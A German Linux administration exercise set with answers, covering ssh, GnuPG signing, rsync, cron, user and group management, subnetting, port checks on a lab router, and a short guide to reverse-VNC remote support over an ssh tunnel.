  1. Mit welcher ssh-Kommandozeilenoption kann der Client X11-Displayforwarding aktivieren?

    • Option: -X

  2. Wie lautet die clientseitige ssh-Kommandozeilenoption, um ausgehend vom lokalen Host einen Tunnel für unsichere Protokolle einzurichten?

    • Option: -L (ssh -L 9901:localhost:901 tux@sambaserver)

  3. Mit welcher Kommandozeile lässt sich ein neuer GnuPG-Key erzeugen?

    gpg --gen-key
  4. Wie heißt das Verzeichnis, in dem dabei der persönliche Schlüsselbund gespeichert wird?

    ~/.gnupg
  5. Signieren Sie eine wichtige Datei in folgenden Schritten:

    • Legen Sie eine Datei namens "einladung.txt" an, schreiben Sie drei fiktive Zeilen hinein. Erstellen Sie aus dieser Datei eine Klartextsignaturdatei mittels der folgenden Zeile:

      gpg --clearsign einladung.txt
      Sie benötigen eine Passphrase, um den geheimen Schlüssel zu entsperren.
      Benutzer: "Max Müller (Familienschlüssel) <max.mueller@gmx.net>"
      1024-Bit RSA Schlüssel, ID ECA1F07B, erzeugt 2014-09-12
      Nehmen Sie bitte wahr, dass jetzt zum Signieren der private Schlüssel verwendet wird, den
      Sie mit Ihrer Passphrase entsperren müssen.
      Wie würde die Standard-Option für das Signieren lauten? (-> man bash)  -> `--sign`
  6. Prüfen Sie die Datenintegrität des eben erstellten neuen ASCII Armored files mit folgender Zeile:

    gpg --verify einladung.txt.asc
    gpg: Signatur vom Mo 15 Sep 2014 08:23:21 CEST mittels RSA-Schlüssel ID ECA1F07B
    gpg: Korrekte Signatur von "Max Müller (Familienschlüssel) <max.mueller@gmx.net>"
  7. Verändern sie mit einem Editor ein Zeichen in eben dieser Datei - und zwar in dem Teil,
    der Ihre eigentliche, zu überbringende Botschaft darstellt. Prüfen Sie noch einmal die Integrität.

    • Kommando: vi einladung.txt.asc # Ein oder zwei Zeichen ändern

    • Kommando: gpg --verify einladung.txt.asc

      gpg: Signatur vom Mo 15 Sep 2014 08:23:21 CEST mittels RSA-Schlüssel ID ECA1F07B
      gpg: FALSCHE Signatur von "Max Müller (Familienschlüssel) <max.mueller@gmx.net>"

21. Übungen und weitere Fragen zur Wiederholung

  1. Begriffserkärungen: Was steht hinter den Begriffen MTA, MUA, MAA und MDA?

    • MTA = Mail Transport Agent (SMTP-Server)

    • MUA = Mail User Agent (Mail Reading/Writing)

    • MAA = Mail Access Agent (Postfache-Server, POP3 / IMAP)

    • MDA = Mail Delivery Agent (Postbote, Mails sortieren)

  2. Erstellen Sie auf dem CentOS-System, wo der ssh-Autologin möglich ist, ein Skript namens syncmirror, das prüft, ob der im folgenden Einzeiler angegebene Quell-Verzeichnispfad existiert und ansonsten mit einer Fehlermeldung abbricht.

    # Master/Slave-Synchronisation: Alle Dateien, die nicht auf dem Client (sendende Seite)
    # existieren,  werden auf dem Zielserver gelöscht!
    
    #rsync  ARCHIVING  MASTER/SLAVE   SENDER=CLIENT               EMPFÄNGER=SERVER
    rsync     -a        --delete      ~/Dokumente/      tux@deb7:/home/tux/Backup/Dokumente/
    #                                            ^
    #                                            |
    #                                    Wenn dieser endende "Directory"-Slash fehlt, wird
    #                              der Ordener als Unterverzeichnis in den Zielordner kopiert!

    Lösung: Siehe Datei syncmirror-0.1

  3. Erstellen Sie als normaler Benutzer auf CentOS einen Cronjob, der aller 2 Stunden außer am Wochenende das Skript syncmirror ausführt.

    crontab -e
    0 */2 * * 1-5  /home/tux/bin/syncmirror-0.1
  4. Erzeugen Sie einen Kommando-alias, der die Zeile echo "Hallo Welt." beinhaltet. Testen Sie, ob er funktioniert und entfernen Sie ihn wieder komplett aus der Prozessumgebung.

    alias welt='echo "Hallo Welt."'
    unalias welt
  5. Nennen Sie zwei systemweite und drei benutzerabhängige Startupdateien und beschreiben Sie ihre Aufgaben.

    /etc/profile, /etc/bashrc    => Konfiguration von Variablen: a) der _PATH_,  b) von _PS1_
    ~/.profile, ~/.bashrc, ~/.bash_logout => diese Dateien überschreiben systemweite
         Einstellungen, siehe oben
    Benutzerabhängige Startupdateien für X-Window-System: ~/.xinitrc (xinit, startx),
    ~/.xsession (bei Verwendung eines Displaymanagers)
  6. Wie kann man den Inhalt der ausgehenden Warteschlange eines MTAs prüfen?

    • Kommando mailq sowie Ornderinhalt /var/spool/mqueue

  7. In welches Verzeichnis legt ein MDA wie procmail die Post eines Users letztlich hinein?

    /var/spool/mail (im mbox-Format)
  8. Beschreiben sie den Unterschied zwischen X-Server, Displaymanager und DISPLAY-Variable.

    1. X-Server: Kommunikation mit Grafikkarte

    2. Displaymanager: Grafisches Login

    3. DISPLAY-Variable: Damit wird einer Applikation mitgeteilt, auf welchem Bildschirm sie erscheinen soll.

  9. Wozu braucht man das Kommando startx?

    • Manuelles Starten des X-Window-Systemes (geht nur wenn kein Displaymanager läuft)

  10. Welches weitere Kommando spielt neben xauth und der Startupdatei ~/.Xauthority eine Rolle, wenn es um die Verwaltung der Zugriffe auf den X-Server geht?

    • xhost (Ohne Parameter: Ausgabe der Zugriffsliste, hier sind die Clients eingetragen, die Grfaiken zu diesem X-Server senden dürfen)

  11. Wie heißen die beiden Konfigurationsdateien für den X-Server (alte und neue Version)?

    • Früher (XFree86): /etc/X11/XF86Config

    • Heute (Xorg): /etc/X11/xorg.conf

  12. Legen Sie vier neue Unix-Gruppen namens Apache, Blackfeet, Cheyenne und Bleichgesichter an. Weisen Sie dabei der ersten Gruppe die ID 3000 zu.

    groupadd -g 3000 Apache
    groupadd Blackfeet
    groupadd Cheyenne
    groupadd Bleichgesichter
  13. Legen Sie zwei neue Benutzer namens Winnetou und Shatterhand an, wobei Winnetou als primäre Gruppe Apache und als sekundäre Gruppen die anderen drei erhalten soll. Dem Benutzer Shatterhand weisen Sie dagegen als primäre Gruppe users zu, sonst soll er vorerst keiner weiteren Gruppe angehören. Schlussendlich erweitern Sie für ihn die Gruppenzugehörigkeit: er darf sich nun auch zur Gruppe Apache zählen.

    useradd -m -g Apache -G Blackfeet,Cheyenne,Bleichgesichter Winnetou
    useradd -m -g users Shatterhand
    passwd Winnetou
    passwd Shatterhand
    usermod -G Apache Shatterhand
  14. Gegeben sei eine Netzwerk-ID von 10.0.0.0/8. Wie viele Bits müssen Sie sich vom Hostanteil borgen, wenn Sie viele, sehr kleine Unternetze schaffen sollen, die aber jeweils mindestens 10 Hosts beinhalten müssen. Wie heißt die neue Netzwerkmaske in CIDR und dezimaler Schreibweise?

    2 ^ x = 10
    x = 4
    
    2 ^ 4 = 16 - 2 = max. 14 adressierbare Hosts
    
    32 - 4 = 28   =>  /28   bzw. 255.255.255.240
  15. Erkunden Sie, welche TCP- und UDP-Ports Ihr Debian-Router geöffnet hat. Verwenden Sie dabei lokal arbeitende Kommandos und spezielle Werkzeuge, die Sie auch remote (von CentOS aus) einsetzen können (vier Tools).

    • netstat -tulpen

    • lsof -i -P

    • nc -zv 172.16.0.1 20-2000

    • nmap 172.16.0.1

  16. Mit welchen drei Werkzeugen können Sie DNS-Eintrage von Nameservern erfragen?

    • nslookup

    • host

    • dig

  17. Mit welchen zwei Werkzeugen kann die Schnittstelle eth0 temporär deaktiviert werden?

    • ifconfig

    • ifdown

  18. Wie setzt man eine Standardgateway-Route, wenn der Router die IP-Adresse 10.0.0.1 hat?

    route add default gw 10.0.0.1
  19. Wie entfernt man sie wieder?

    route del default
  20. Wie heißen die Konfigurationsdateien des TCP-Wrappers? Listen Sie die Dateinamen gemäß ihrer Abarbeitsungreihenfolge auf.

    1. /etc/hosts.allow

    2. /etc/hosts.deny

  21. Wie heißt die Anweisung beim Xinetd, mit der man das Interface-Listening auf die Adresse 10.0.0.2 einschränken kann?

    bind = 10.0.0.2

21.1. Fernsteuerung mit Linux-Bordmitteln

Anstelle des bekannten und unter Linux leider nicht ohne wine zum Laufen zu bringenden teamviewer lässt sich das Ziel, entfernten Benutzern auf grafischen Wege zu Hilfe zu eilen, recht gut mit dem VNC-Server x11vnc und dem VNC-Viewer xvnc4viewer erreichen.

Gemäß http://wiki.ubuntuusers.de/VNC#Reverse-VNC-Verbindung kann die Verbindung leicht über einen SSH-Tunnel abgesichert werden. An dieser Stelle sei nur das Wichtigste herausgestellt:

  1. Auf dem Rechner der Helfers

    apt-get install xvnc4viewer
    
    vncviewer -listen      ### Als normaler Benutzer!
  2. Auf dem Rechner des Hilfesuchenden

    apt-get install x11vnc
    
    ssh -NfL 5500:localhost:5500 hilflos@IP-ADRESSE-HELFER sleep 2 && x11vnc -connect_or_exit localhost:5500 -scale 9/10

Weiterführende Tipps

  • Um die Sicherheit zu verbessern, kann beim Hilfesuchenden ein höherer Port (z.B. 54666) verwendet werden:

    ssh -p 54666 -NfL ...

    Falls der Helfer hinter einem Router sitzt, gibt er dann diesen Port beim Einrichten des Port-Forwardings an und leitet die Kommunikation dann auf den eigentlichen Rechner (i.d.R. Port 22) im LAN weiter.

  • Neben der Verschlüsselung via separatem ssl-Tunnel kann x11vnc mit der Option -ssl auch nativ verschlüsseln, siehe auch:

  • Leider gibt es bei dyndns.org die dynamische Namensauflösung nicht mehr kostenlos, man kann sich aber bei z.B. bei http://selfhost.de (Steht im Speedport-Router der Telekom mit zur Auswahl) registrieren, dort kostet dieser Dienst nichts.